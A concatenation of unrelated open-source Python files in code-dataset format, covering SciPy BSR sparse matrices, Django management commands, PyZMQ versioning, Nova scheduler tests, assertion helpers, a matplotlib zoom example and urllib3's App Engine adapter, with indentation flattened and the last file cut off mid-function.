raise ValueError("column index values must be < %d (now max %d)" % (N//C, self.indices.max()))
if self.indices.min() < 0:
raise ValueError("column index values must be >= 0")
if np.diff(self.indptr).min() < 0:
raise ValueError("index pointer values must form a "
"non-decreasing sequence")
# if not self.has_sorted_indices():
# warn('Indices were not in sorted order. Sorting indices.')
# self.sort_indices(check_first=False)
def _get_blocksize(self):
return self.data.shape[1:]
blocksize = property(fget=_get_blocksize)
def getnnz(self, axis=None):
if axis is not None:
raise NotImplementedError("getnnz over an axis is not implemented "
"for BSR format")
R,C = self.blocksize
return int(self.indptr[-1] * R * C)
getnnz.__doc__ = spmatrix.getnnz.__doc__
def __repr__(self):
format = _formats[self.getformat()][1]
return ("<%dx%d sparse matrix of type '%s'\n"
"\twith %d stored elements (blocksize = %dx%d) in %s format>" %
(self.shape + (self.dtype.type, self.nnz) + self.blocksize +
(format,)))
def diagonal(self, k=0):
rows, cols = self.shape
if k <= -rows or k >= cols:
return np.empty(0, dtype=self.data.dtype)
R, C = self.blocksize
y = np.zeros(min(rows + min(k, 0), cols - max(k, 0)),
dtype=upcast(self.dtype))
_sparsetools.bsr_diagonal(k, rows // R, cols // C, R, C,
self.indptr, self.indices,
np.ravel(self.data), y)
return y
diagonal.__doc__ = spmatrix.diagonal.__doc__
##########################
# NotImplemented methods #
##########################
def __getitem__(self,key):
raise NotImplementedError
def __setitem__(self,key,val):
raise NotImplementedError
######################
# Arithmetic methods #
######################
@np.deprecate(message="BSR matvec is deprecated in SciPy 0.19.0. "
"Use * operator instead.")
def matvec(self, other):
"""Multiply matrix by vector."""
return self * other
@np.deprecate(message="BSR matmat is deprecated in SciPy 0.19.0. "
"Use * operator instead.")
def matmat(self, other):
"""Multiply this sparse matrix by other matrix."""
return self * other
def _add_dense(self, other):
return self.tocoo(copy=False)._add_dense(other)
def _mul_vector(self, other):
M,N = self.shape
R,C = self.blocksize
result = np.zeros(self.shape[0], dtype=upcast(self.dtype, other.dtype))
bsr_matvec(M//R, N//C, R, C,
self.indptr, self.indices, self.data.ravel(),
other, result)
return result
def _mul_multivector(self,other):
R,C = self.blocksize
M,N = self.shape
n_vecs = other.shape[1] # number of column vectors
result = np.zeros((M,n_vecs), dtype=upcast(self.dtype,other.dtype))
bsr_matvecs(M//R, N//C, n_vecs, R, C,
self.indptr, self.indices, self.data.ravel(),
other.ravel(), result.ravel())
return result
def _mul_sparse_matrix(self, other):
M, K1 = self.shape
K2, N = other.shape
R,n = self.blocksize
# convert to this format
if isspmatrix_bsr(other):
C = other.blocksize[1]
else:
C = 1
from .csr import isspmatrix_csr
if isspmatrix_csr(other) and n == 1:
other = other.tobsr(blocksize=(n,C), copy=False) # lightweight conversion
else:
other = other.tobsr(blocksize=(n,C))
idx_dtype = get_index_dtype((self.indptr, self.indices,
other.indptr, other.indices))
bnnz = csr_matmat_maxnnz(M//R, N//C,
self.indptr.astype(idx_dtype),
self.indices.astype(idx_dtype),
other.indptr.astype(idx_dtype),
other.indices.astype(idx_dtype))
idx_dtype = get_index_dtype((self.indptr, self.indices,
other.indptr, other.indices),
maxval=bnnz)
indptr = np.empty(self.indptr.shape, dtype=idx_dtype)
indices = np.empty(bnnz, dtype=idx_dtype)
data = np.empty(R*C*bnnz, dtype=upcast(self.dtype,other.dtype))
bsr_matmat(bnnz, M//R, N//C, R, C, n,
self.indptr.astype(idx_dtype),
self.indices.astype(idx_dtype),
np.ravel(self.data),
other.indptr.astype(idx_dtype),
other.indices.astype(idx_dtype),
np.ravel(other.data),
indptr,
indices,
data)
data = data.reshape(-1,R,C)
# TODO eliminate zeros
return bsr_matrix((data,indices,indptr),shape=(M,N),blocksize=(R,C))
######################
# Conversion methods #
######################
def tobsr(self, blocksize=None, copy=False):
"""Convert this matrix into Block Sparse Row Format.
With copy=False, the data/indices may be shared between this
matrix and the resultant bsr_matrix.
If blocksize=(R, C) is provided, it will be used for determining
block size of the bsr_matrix.
"""
if blocksize not in [None, self.blocksize]:
return self.tocsr().tobsr(blocksize=blocksize)
if copy:
return self.copy()
else:
return self
def tocsr(self, copy=False):
M, N = self.shape
R, C = self.blocksize
nnz = self.nnz
idx_dtype = get_index_dtype((self.indptr, self.indices),
maxval=max(nnz, N))
indptr = np.empty(M + 1, dtype=idx_dtype)
indices = np.empty(nnz, dtype=idx_dtype)
data = np.empty(nnz, dtype=upcast(self.dtype))
bsr_tocsr(M // R, # n_brow
N // C, # n_bcol
R, C,
self.indptr.astype(idx_dtype, copy=False),
self.indices.astype(idx_dtype, copy=False),
self.data,
indptr,
indices,
data)
from .csr import csr_matrix
return csr_matrix((data, indices, indptr), shape=self.shape)
tocsr.__doc__ = spmatrix.tocsr.__doc__
def tocsc(self, copy=False):
return self.tocsr(copy=False).tocsc(copy=copy)
tocsc.__doc__ = spmatrix.tocsc.__doc__
def tocoo(self, copy=True):
"""Convert this matrix to COOrdinate format.
When copy=False the data array will be shared between
this matrix and the resultant coo_matrix.
"""
M,N = self.shape
R,C = self.blocksize
indptr_diff = np.diff(self.indptr)
if indptr_diff.dtype.itemsize > np.dtype(np.intp).itemsize:
# Check for potential overflow
indptr_diff_limited = indptr_diff.astype(np.intp)
if np.any(indptr_diff_limited != indptr_diff):
raise ValueError("Matrix too big to convert")
indptr_diff = indptr_diff_limited
row = (R * np.arange(M//R)).repeat(indptr_diff)
row = row.repeat(R*C).reshape(-1,R,C)
row += np.tile(np.arange(R).reshape(-1,1), (1,C))
row = row.reshape(-1)
col = (C * self.indices).repeat(R*C).reshape(-1,R,C)
col += np.tile(np.arange(C), (R,1))
col = col.reshape(-1)
data = self.data.reshape(-1)
if copy:
data = data.copy()
from .coo import coo_matrix
return coo_matrix((data,(row,col)), shape=self.shape)
def toarray(self, order=None, out=None):
return self.tocoo(copy=False).toarray(order=order, out=out)
toarray.__doc__ = spmatrix.toarray.__doc__
def transpose(self, axes=None, copy=False):
if axes is not None:
raise ValueError(("Sparse matrices do not support "
"an 'axes' parameter because swapping "
"dimensions is the only logical permutation."))
R, C = self.blocksize
M, N = self.shape
NBLK = self.nnz//(R*C)
if self.nnz == 0:
return bsr_matrix((N, M), blocksize=(C, R),
dtype=self.dtype, copy=copy)
indptr = np.empty(N//C + 1, dtype=self.indptr.dtype)
indices = np.empty(NBLK, dtype=self.indices.dtype)
data = np.empty((NBLK, C, R), dtype=self.data.dtype)
bsr_transpose(M//R, N//C, R, C,
self.indptr, self.indices, self.data.ravel(),
indptr, indices, data.ravel())
return bsr_matrix((data, indices, indptr),
shape=(N, M), copy=copy)
transpose.__doc__ = spmatrix.transpose.__doc__
##############################################################
# methods that examine or modify the internal data structure #
##############################################################
def eliminate_zeros(self):
"""Remove zero elements in-place."""
if not self.nnz:
return # nothing to do
R,C = self.blocksize
M,N = self.shape
mask = (self.data != 0).reshape(-1,R*C).sum(axis=1) # nonzero blocks
nonzero_blocks = mask.nonzero()[0]
self.data[:len(nonzero_blocks)] = self.data[nonzero_blocks]
# modifies self.indptr and self.indices *in place*
_sparsetools.csr_eliminate_zeros(M//R, N//C, self.indptr,
self.indices, mask)
self.prune()
def sum_duplicates(self):
"""Eliminate duplicate matrix entries by adding them together
The is an *in place* operation
"""
if self.has_canonical_format:
return
self.sort_indices()
R, C = self.blocksize
M, N = self.shape
# port of _sparsetools.csr_sum_duplicates
n_row = M // R
nnz = 0
row_end = 0
for i in range(n_row):
jj = row_end
row_end = self.indptr[i+1]
while jj < row_end:
j = self.indices[jj]
x = self.data[jj]
jj += 1
while jj < row_end and self.indices[jj] == j:
x += self.data[jj]
jj += 1
self.indices[nnz] = j
self.data[nnz] = x
nnz += 1
self.indptr[i+1] = nnz
self.prune() # nnz may have changed
self.has_canonical_format = True
def sort_indices(self):
"""Sort the indices of this matrix *in place*
"""
if self.has_sorted_indices:
return
R,C = self.blocksize
M,N = self.shape
bsr_sort_indices(M//R, N//C, R, C, self.indptr, self.indices, self.data.ravel())
self.has_sorted_indices = True
def prune(self):
""" Remove empty space after all non-zero elements.
"""
R,C = self.blocksize
M,N = self.shape
if len(self.indptr) != M//R + 1:
raise ValueError("index pointer has invalid length")
bnnz = self.indptr[-1]
if len(self.indices) < bnnz:
raise ValueError("indices array has too few elements")
if len(self.data) < bnnz:
raise ValueError("data array has too few elements")
self.data = self.data[:bnnz]
self.indices = self.indices[:bnnz]
# utility functions
def _binopt(self, other, op, in_shape=None, out_shape=None):
"""Apply the binary operation fn to two sparse matrices."""
# Ideally we'd take the GCDs of the blocksize dimensions
# and explode self and other to match.
other = self.__class__(other, blocksize=self.blocksize)
# e.g. bsr_plus_bsr, etc.
fn = getattr(_sparsetools, self.format + op + self.format)
R,C = self.blocksize
max_bnnz = len(self.data) + len(other.data)
idx_dtype = get_index_dtype((self.indptr, self.indices,
other.indptr, other.indices),
maxval=max_bnnz)
indptr = np.empty(self.indptr.shape, dtype=idx_dtype)
indices = np.empty(max_bnnz, dtype=idx_dtype)
bool_ops = ['_ne_', '_lt_', '_gt_', '_le_', '_ge_']
if op in bool_ops:
data = np.empty(R*C*max_bnnz, dtype=np.bool_)
else:
data = np.empty(R*C*max_bnnz, dtype=upcast(self.dtype,other.dtype))
fn(self.shape[0]//R, self.shape[1]//C, R, C,
self.indptr.astype(idx_dtype),
self.indices.astype(idx_dtype),
self.data,
other.indptr.astype(idx_dtype),
other.indices.astype(idx_dtype),
np.ravel(other.data),
indptr,
indices,
data)
actual_bnnz = indptr[-1]
indices = indices[:actual_bnnz]
data = data[:R*C*actual_bnnz]
if actual_bnnz < max_bnnz/2:
indices = indices.copy()
data = data.copy()
data = data.reshape(-1,R,C)
return self.__class__((data, indices, indptr), shape=self.shape)
# needed by _data_matrix
def _with_data(self,data,copy=True):
"""Returns a matrix with the same sparsity structure as self,
but with different data. By default the structure arrays
(i.e. .indptr and .indices) are copied.
"""
if copy:
return self.__class__((data,self.indices.copy(),self.indptr.copy()),
shape=self.shape,dtype=data.dtype)
else:
return self.__class__((data,self.indices,self.indptr),
shape=self.shape,dtype=data.dtype)
# # these functions are used by the parent class
# # to remove redudancy between bsc_matrix and bsr_matrix
# def _swap(self,x):
# """swap the members of x if this is a column-oriented matrix
# """
# return (x[0],x[1])
def isspmatrix_bsr(x):
"""Is x of a bsr_matrix type?
Parameters
----------
x
object to check for being a bsr matrix
Returns
-------
bool
True if x is a bsr matrix, False otherwise
Examples
--------
>>> from scipy.sparse import bsr_matrix, isspmatrix_bsr
>>> isspmatrix_bsr(bsr_matrix([[5]]))
True
>>> from scipy.sparse import bsr_matrix, csr_matrix, isspmatrix_bsr
>>> isspmatrix_bsr(csr_matrix([[5]]))
False
"""
return isinstance(x, bsr_matrix)
| bsd-3-clause |
akvo/akvo-rsr | akvo/rsr/management/commands/create_organisation_codelist.py | 1 | 1787 | # -*- coding: utf-8 -*-
# Akvo Reporting is covered by the GNU Affero General Public License.
# See more details in the license.txt file located at the root folder of the Akvo RSR module.
# For additional details on the GNU license please see < http://www.gnu.org/licenses/agpl.html >.
"""Create or Update a codelist and optionally link it to organisations.
Usage:
python manage.py create_organisation_codelist <slug> <json-path>_[<org-ids>]
"""
import json
import sys
from django.core.management.base import BaseCommand
from akvo.rsr.models import OrganisationCodelist, Organisation
class Command(BaseCommand):
help = __doc__
def add_arguments(self, parser):
parser.add_argument('slug', type=str)
parser.add_argument('json_path', type=open)
parser.add_argument('org_ids', nargs='+', type=int)
parser.add_argument('--update', action='store_true', dest='update')
def handle(self, *args, **options):
org_ids = options['org_ids']
organisations = Organisation.objects.filter(id__in=org_ids)
update = options['update']
data = json.load(options['json_path'])
codelist, created = OrganisationCodelist.objects.get_or_create(
slug=options['slug'], defaults={'data': data})
if not created and not update:
print('Codelist with the slug already exists. Use --update to update it.')
sys.exit(1)
if update:
codelist.data = data
codelist.save(update_fields=['data'])
missing_orgs = set(org_ids) - set(org.id for org in organisations)
if missing_orgs:
print('Could not find organisations with ids: ', list(missing_orgs))
sys.exit(1)
organisations.update(codelist=codelist)
| agpl-3.0 |
Alidron/demo-nao | alidron-env/lib/python2.7/site-packages/zmq/sugar/version.py | 5 | 1231 | """PyZMQ and 0MQ version functions."""
# Copyright (C) PyZMQ Developers
# Distributed under the terms of the Modified BSD License.
from zmq.backend import zmq_version_info
VERSION_MAJOR = 15
VERSION_MINOR = 2
VERSION_PATCH = 0
VERSION_EXTRA = ""
__version__ = '%i.%i.%i' % (VERSION_MAJOR, VERSION_MINOR, VERSION_PATCH)
if VERSION_EXTRA:
__version__ = "%s.%s" % (__version__, VERSION_EXTRA)
version_info = (VERSION_MAJOR, VERSION_MINOR, VERSION_PATCH, float('inf'))
else:
version_info = (VERSION_MAJOR, VERSION_MINOR, VERSION_PATCH)
__revision__ = ''
def pyzmq_version():
"""return the version of pyzmq as a string"""
if __revision__:
return '@'.join([__version__,__revision__[:6]])
else:
return __version__
def pyzmq_version_info():
"""return the pyzmq version as a tuple of at least three numbers
If pyzmq is a development version, `inf` will be appended after the third integer.
"""
return version_info
def zmq_version():
"""return the version of libzmq as a string"""
return "%i.%i.%i" % zmq_version_info()
__all__ = ['zmq_version', 'zmq_version_info',
'pyzmq_version','pyzmq_version_info',
'__version__', '__revision__'
]
| mpl-2.0 |
dawnpower/nova | nova/tests/unit/scheduler/test_scheduler_options.py | 30 | 5233 | # Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests For PickledScheduler.
"""
import datetime
import StringIO
from oslo_serialization import jsonutils
from nova.scheduler import scheduler_options
from nova import test
class FakeSchedulerOptions(scheduler_options.SchedulerOptions):
def __init__(self, last_checked, now, file_old, file_now, data, filedata):
super(FakeSchedulerOptions, self).__init__()
# Change internals ...
self.last_modified = file_old
self.last_checked = last_checked
self.data = data
# For overrides ...
self._time_now = now
self._file_now = file_now
self._file_data = filedata
self.file_was_loaded = False
def _get_file_timestamp(self, filename):
return self._file_now
def _get_file_handle(self, filename):
self.file_was_loaded = True
return StringIO.StringIO(self._file_data)
def _get_time_now(self):
return self._time_now
class SchedulerOptionsTestCase(test.NoDBTestCase):
def test_get_configuration_first_time_no_flag(self):
last_checked = None
now = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_old = None
file_now = datetime.datetime(2012, 1, 1, 1, 1, 1)
data = dict(a=1, b=2, c=3)
jdata = jsonutils.dumps(data)
fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
{}, jdata)
self.assertEqual({}, fake.get_configuration())
self.assertFalse(fake.file_was_loaded)
def test_get_configuration_first_time_empty_file(self):
last_checked = None
now = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_old = None
file_now = datetime.datetime(2012, 1, 1, 1, 1, 1)
jdata = ""
fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
{}, jdata)
self.assertEqual({}, fake.get_configuration('foo.json'))
self.assertTrue(fake.file_was_loaded)
def test_get_configuration_first_time_happy_day(self):
last_checked = None
now = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_old = None
file_now = datetime.datetime(2012, 1, 1, 1, 1, 1)
data = dict(a=1, b=2, c=3)
jdata = jsonutils.dumps(data)
fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
{}, jdata)
self.assertEqual(data, fake.get_configuration('foo.json'))
self.assertTrue(fake.file_was_loaded)
def test_get_configuration_second_time_no_change(self):
last_checked = datetime.datetime(2011, 1, 1, 1, 1, 1)
now = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_old = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_now = datetime.datetime(2012, 1, 1, 1, 1, 1)
data = dict(a=1, b=2, c=3)
jdata = jsonutils.dumps(data)
fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
data, jdata)
self.assertEqual(data, fake.get_configuration('foo.json'))
self.assertFalse(fake.file_was_loaded)
def test_get_configuration_second_time_too_fast(self):
last_checked = datetime.datetime(2011, 1, 1, 1, 1, 1)
now = datetime.datetime(2011, 1, 1, 1, 1, 2)
file_old = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_now = datetime.datetime(2013, 1, 1, 1, 1, 1)
old_data = dict(a=1, b=2, c=3)
data = dict(a=11, b=12, c=13)
jdata = jsonutils.dumps(data)
fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
old_data, jdata)
self.assertEqual(old_data, fake.get_configuration('foo.json'))
self.assertFalse(fake.file_was_loaded)
def test_get_configuration_second_time_change(self):
last_checked = datetime.datetime(2011, 1, 1, 1, 1, 1)
now = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_old = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_now = datetime.datetime(2013, 1, 1, 1, 1, 1)
old_data = dict(a=1, b=2, c=3)
data = dict(a=11, b=12, c=13)
jdata = jsonutils.dumps(data)
fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
old_data, jdata)
self.assertEqual(data, fake.get_configuration('foo.json'))
self.assertTrue(fake.file_was_loaded)
| apache-2.0 |
koomik/CouchPotatoServer | libs/pyutil/assertutil.py | 106 | 2753 | # Copyright (c) 2003-2009 Zooko Wilcox-O'Hearn
# This file is part of pyutil; see README.rst for licensing terms.
"""
Tests useful in assertion checking, prints out nicely formated messages too.
"""
from humanreadable import hr
def _assert(___cond=False, *___args, **___kwargs):
if ___cond:
return True
msgbuf=[]
if ___args:
msgbuf.append("%s %s" % tuple(map(hr, (___args[0], type(___args[0]),))))
msgbuf.extend([", %s %s" % tuple(map(hr, (arg, type(arg),))) for arg in ___args[1:]])
if ___kwargs:
msgbuf.append(", %s: %s %s" % ((___kwargs.items()[0][0],) + tuple(map(hr, (___kwargs.items()[0][1], type(___kwargs.items()[0][1]),)))))
else:
if ___kwargs:
msgbuf.append("%s: %s %s" % ((___kwargs.items()[0][0],) + tuple(map(hr, (___kwargs.items()[0][1], type(___kwargs.items()[0][1]),)))))
msgbuf.extend([", %s: %s %s" % tuple(map(hr, (k, v, type(v),))) for k, v in ___kwargs.items()[1:]])
raise AssertionError, "".join(msgbuf)
def precondition(___cond=False, *___args, **___kwargs):
if ___cond:
return True
msgbuf=["precondition", ]
if ___args or ___kwargs:
msgbuf.append(": ")
if ___args:
msgbuf.append("%s %s" % tuple(map(hr, (___args[0], type(___args[0]),))))
msgbuf.extend([", %s %s" % tuple(map(hr, (arg, type(arg),))) for arg in ___args[1:]])
if ___kwargs:
msgbuf.append(", %s: %s %s" % ((___kwargs.items()[0][0],) + tuple(map(hr, (___kwargs.items()[0][1], type(___kwargs.items()[0][1]),)))))
else:
if ___kwargs:
msgbuf.append("%s: %s %s" % ((___kwargs.items()[0][0],) + tuple(map(hr, (___kwargs.items()[0][1], type(___kwargs.items()[0][1]),)))))
msgbuf.extend([", %s: %s %s" % tuple(map(hr, (k, v, type(v),))) for k, v in ___kwargs.items()[1:]])
raise AssertionError, "".join(msgbuf)
def postcondition(___cond=False, *___args, **___kwargs):
if ___cond:
return True
msgbuf=["postcondition", ]
if ___args or ___kwargs:
msgbuf.append(": ")
if ___args:
msgbuf.append("%s %s" % tuple(map(hr, (___args[0], type(___args[0]),))))
msgbuf.extend([", %s %s" % tuple(map(hr, (arg, type(arg),))) for arg in ___args[1:]])
if ___kwargs:
msgbuf.append(", %s: %s %s" % ((___kwargs.items()[0][0],) + tuple(map(hr, (___kwargs.items()[0][1], type(___kwargs.items()[0][1]),)))))
else:
if ___kwargs:
msgbuf.append("%s: %s %s" % ((___kwargs.items()[0][0],) + tuple(map(hr, (___kwargs.items()[0][1], type(___kwargs.items()[0][1]),)))))
msgbuf.extend([", %s: %s %s" % tuple(map(hr, (k, v, type(v),))) for k, v in ___kwargs.items()[1:]])
raise AssertionError, "".join(msgbuf)
| gpl-3.0 |
eemirtekin/edx-platform | common/djangoapps/track/management/tracked_command.py | 255 | 2063 | """Provides management command calling info to tracking context."""
from django.core.management.base import BaseCommand
from eventtracking import tracker
class TrackedCommand(BaseCommand):
"""
Provides management command calling info to tracking context.
Information provided to context includes the following value:
'command': the program name and the subcommand used to run a management command.
In future, other values (such as args and options) could be added as needed.
An example tracking log entry resulting from running the 'create_user' management command:
{
"username": "anonymous",
"host": "",
"event_source": "server",
"event_type": "edx.course.enrollment.activated",
"context": {
"course_id": "edX/Open_DemoX/edx_demo_course",
"org_id": "edX",
"command": "./manage.py create_user",
},
"time": "2014-01-06T15:59:49.599522+00:00",
"ip": "",
"event": {
"course_id": "edX/Open_DemoX/edx_demo_course",
"user_id": 29,
"mode": "verified"
},
"agent": "",
"page": null
}
The name of the context used to add (and remove) these values is "edx.mgmt.command".
The context name is used to allow the context additions to be scoped, but doesn't
appear in the context itself.
"""
prog_name = 'unknown'
def create_parser(self, prog_name, subcommand):
"""Wraps create_parser to snag command line info."""
self.prog_name = "{} {}".format(prog_name, subcommand)
return super(TrackedCommand, self).create_parser(prog_name, subcommand)
def execute(self, *args, **options):
"""Wraps base execute() to add command line to tracking context."""
context = {
'command': self.prog_name,
}
COMMAND_CONTEXT_NAME = 'edx.mgmt.command'
with tracker.get_tracker().context(COMMAND_CONTEXT_NAME, context):
super(TrackedCommand, self).execute(*args, **options)
| agpl-3.0 |
ryandougherty/mwa-capstone | MWA_Tools/build/matplotlib/examples/pylab_examples/axes_zoom_effect.py | 3 | 3293 | from matplotlib.transforms import Bbox, TransformedBbox, \
blended_transform_factory
from mpl_toolkits.axes_grid1.inset_locator import BboxPatch, BboxConnector,\
BboxConnectorPatch
def connect_bbox(bbox1, bbox2,
loc1a, loc2a, loc1b, loc2b,
prop_lines, prop_patches=None):
if prop_patches is None:
prop_patches = prop_lines.copy()
prop_patches["alpha"] = prop_patches.get("alpha", 1)*0.2
c1 = BboxConnector(bbox1, bbox2, loc1=loc1a, loc2=loc2a, **prop_lines)
c1.set_clip_on(False)
c2 = BboxConnector(bbox1, bbox2, loc1=loc1b, loc2=loc2b, **prop_lines)
c2.set_clip_on(False)
bbox_patch1 = BboxPatch(bbox1, **prop_patches)
bbox_patch2 = BboxPatch(bbox2, **prop_patches)
p = BboxConnectorPatch(bbox1, bbox2,
#loc1a=3, loc2a=2, loc1b=4, loc2b=1,
loc1a=loc1a, loc2a=loc2a, loc1b=loc1b, loc2b=loc2b,
**prop_patches)
p.set_clip_on(False)
return c1, c2, bbox_patch1, bbox_patch2, p
def zoom_effect01(ax1, ax2, xmin, xmax, **kwargs):
u"""
ax1 : the main axes
ax1 : the zoomed axes
(xmin,xmax) : the limits of the colored area in both plot axes.
connect ax1 & ax2. The x-range of (xmin, xmax) in both axes will
be marked. The keywords parameters will be used ti create
patches.
"""
trans1 = blended_transform_factory(ax1.transData, ax1.transAxes)
trans2 = blended_transform_factory(ax2.transData, ax2.transAxes)
bbox = Bbox.from_extents(xmin, 0, xmax, 1)
mybbox1 = TransformedBbox(bbox, trans1)
mybbox2 = TransformedBbox(bbox, trans2)
prop_patches=kwargs.copy()
prop_patches["ec"]="none"
prop_patches["alpha"]=0.2
c1, c2, bbox_patch1, bbox_patch2, p = \
connect_bbox(mybbox1, mybbox2,
loc1a=3, loc2a=2, loc1b=4, loc2b=1,
prop_lines=kwargs, prop_patches=prop_patches)
ax1.add_patch(bbox_patch1)
ax2.add_patch(bbox_patch2)
ax2.add_patch(c1)
ax2.add_patch(c2)
ax2.add_patch(p)
return c1, c2, bbox_patch1, bbox_patch2, p
def zoom_effect02(ax1, ax2, **kwargs):
u"""
ax1 : the main axes
ax1 : the zoomed axes
Similar to zoom_effect01. The xmin & xmax will be taken from the
ax1.viewLim.
"""
tt = ax1.transScale + (ax1.transLimits + ax2.transAxes)
trans = blended_transform_factory(ax2.transData, tt)
mybbox1 = ax1.bbox
mybbox2 = TransformedBbox(ax1.viewLim, trans)
prop_patches=kwargs.copy()
prop_patches["ec"]="none"
prop_patches["alpha"]=0.2
c1, c2, bbox_patch1, bbox_patch2, p = \
connect_bbox(mybbox1, mybbox2,
loc1a=3, loc2a=2, loc1b=4, loc2b=1,
prop_lines=kwargs, prop_patches=prop_patches)
ax1.add_patch(bbox_patch1)
ax2.add_patch(bbox_patch2)
ax2.add_patch(c1)
ax2.add_patch(c2)
ax2.add_patch(p)
return c1, c2, bbox_patch1, bbox_patch2, p
import matplotlib.pyplot as plt
plt.figure(1, figsize=(5,5))
ax1 = plt.subplot(221)
ax2 = plt.subplot(212)
ax2.set_xlim(0, 1)
ax2.set_xlim(0, 5)
zoom_effect01(ax1, ax2, 0.2, 0.8)
ax1 = plt.subplot(222)
ax1.set_xlim(2, 3)
ax2.set_xlim(0, 5)
zoom_effect02(ax1, ax2)
plt.show()
| gpl-2.0 |
heytcass/homeassistant-config | deps/requests/packages/urllib3/contrib/appengine.py | 360 | 7937 | from __future__ import absolute_import
import logging
import os
import warnings
from ..exceptions import (
HTTPError,
HTTPWarning,
MaxRetryError,
ProtocolError,
TimeoutError,
SSLError
)
from ..packages.six import BytesIO
from ..request import RequestMethods
from ..response import HTTPResponse
from ..util.timeout import Timeout
from ..util.retry import Retry
try:
from google.appengine.api import urlfetch
except ImportError:
urlfetch = None
log = logging.getLogger(__name__)
class AppEnginePlatformWarning(HTTPWarning):
pass
class AppEnginePlatformError(HTTPError):
pass
class AppEngineManager(RequestMethods):
"""
Connection manager for Google App Engine sandbox applications.
This manager uses the URLFetch service directly instead of using the
emulated httplib, and is subject to URLFetch limitations as described in
the App Engine documentation here:
https://cloud.google.com/appengine/docs/python/urlfetch
Notably it will raise an AppEnginePlatformError if:
* URLFetch is not available.
* If you attempt to use this on GAEv2 (Managed VMs), as full socket
support is available.
* If a request size is more than 10 megabytes.
* If a response size is more than 32 megabtyes.
* If you use an unsupported request method such as OPTIONS.
Beyond those cases, it will raise normal urllib3 errors.
"""
def __init__(self, headers=None, retries=None, validate_certificate=True):
if not urlfetch:
raise AppEnginePlatformError(
"URLFetch is not available in this environment.")
if is_prod_appengine_mvms():
raise AppEnginePlatformError(
"Use normal urllib3.PoolManager instead of AppEngineManager"
"on Managed VMs, as using URLFetch is not necessary in "
"this environment.")
warnings.warn(
"urllib3 is using URLFetch on Google App Engine sandbox instead "
"of sockets. To use sockets directly instead of URLFetch see "
"https://urllib3.readthedocs.io/en/latest/contrib.html.",
AppEnginePlatformWarning)
RequestMethods.__init__(self, headers)
self.validate_certificate = validate_certificate
self.retries = retries or Retry.DEFAULT
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
# Return False to re-raise any potential exceptions
return False
def urlopen(self, method, url, body=None, headers=None,
retries=None, redirect=True, timeout=Timeout.DEFAULT_TIMEOUT,
**response_kw):
retries = self._get_retries(retries, redirect)
try:
response = urlfetch.fetch(
url,
payload=body,
method=method,
headers=headers or {},
allow_truncated=False,
follow_redirects=(
redirect and
retries.redirect != 0 and
retries.total),
deadline=self._get_absolute_timeout(timeout),
validate_certificate=self.validate_certificate,
)
except urlfetch.DeadlineExceededError as e:
raise TimeoutError(self, e)
except urlfetch.InvalidURLError as e:
if 'too large' in str(e):
raise AppEnginePlatformError(
"URLFetch request too large, URLFetch only "
"supports requests up to 10mb in size.", e)
raise ProtocolError(e)
except urlfetch.DownloadError as e:
if 'Too many redirects' in str(e):
raise MaxRetryError(self, url, reason=e)
raise ProtocolError(e)
except urlfetch.ResponseTooLargeError as e:
raise AppEnginePlatformError(
"URLFetch response too large, URLFetch only supports"
"responses up to 32mb in size.", e)
except urlfetch.SSLCertificateError as e:
raise SSLError(e)
except urlfetch.InvalidMethodError as e:
raise AppEnginePlatformError(
"URLFetch does not support method: %s" % method, e)
http_response = self._urlfetch_response_to_http_response(
response, **response_kw)
# Check for redirect response
if (http_response.get_redirect_location() and
retries.raise_on_redirect and redirect):
raise MaxRetryError(self, url, "too many redirects")
# Check if we should retry the HTTP response.
if retries.is_forced_retry(method, status_code=http_response.status):
retries = retries.increment(
method, url, response=http_response, _pool=self)
log.info("Forced retry: %s", url)
retries.sleep()
return self.urlopen(
method, url,
body=body, headers=headers,
retries=retries, redirect=redirect,
timeout=timeout, **response_kw)
return http_response
def _urlfetch_response_to_http_response(self, urlfetch_resp, **response_kw):
if is_prod_appengine():
# Production GAE handles deflate encoding automatically, but does
# not remove the encoding header.
content_encoding = urlfetch_resp.headers.get('content-encoding')
if content_encoding == 'deflate':
del urlfetch_resp.headers['content-encoding']
transfer_encoding = urlfetch_resp.headers.get('transfer-encoding')
# We have a full response's content,
# so let's make sure we don't report ourselves as chunked data.
if transfer_encoding == 'chunked':
encodings = transfer_encoding.split(",")
encodings.remove('chunked')
urlfetch_resp.headers['transfer-encoding'] = ','.join(encodings)
return HTTPResponse(
# In order for decoding to work, we must present the content as
# a file-like object.
body=BytesIO(urlfetch_resp.content),
headers=urlfetch_resp.headers,
status=urlfetch_resp.status_code,
**response_kw
)
def _get_absolute_timeout(self, timeout):
if timeout is Timeout.DEFAULT_TIMEOUT:
return 5 # 5s is the default timeout for URLFetch.
if isinstance(timeout, Timeout):
if timeout._read is not timeout._connect:
warnings.warn(
"URLFetch does not support granular timeout settings, "
"reverting to total timeout.", AppEnginePlatformWarning)
return timeout.total
return timeout
def _get_retries(self, retries, redirect):
if not isinstance(retries, Retry):
retries = Retry.from_int(
retries, redirect=redirect, default=self.retries)
if retries.connect or retries.read or retries.redirect:
warnings.warn(
"URLFetch only supports total retries and does not "
"recognize connect, read, or redirect retry parameters.",
AppEnginePlatformWarning)
return retries
def is_appengine():
return (is_local_appengine() or
is_prod_appengine() or
is_prod_appengine_mvms())
def is_appengine_sandbox():
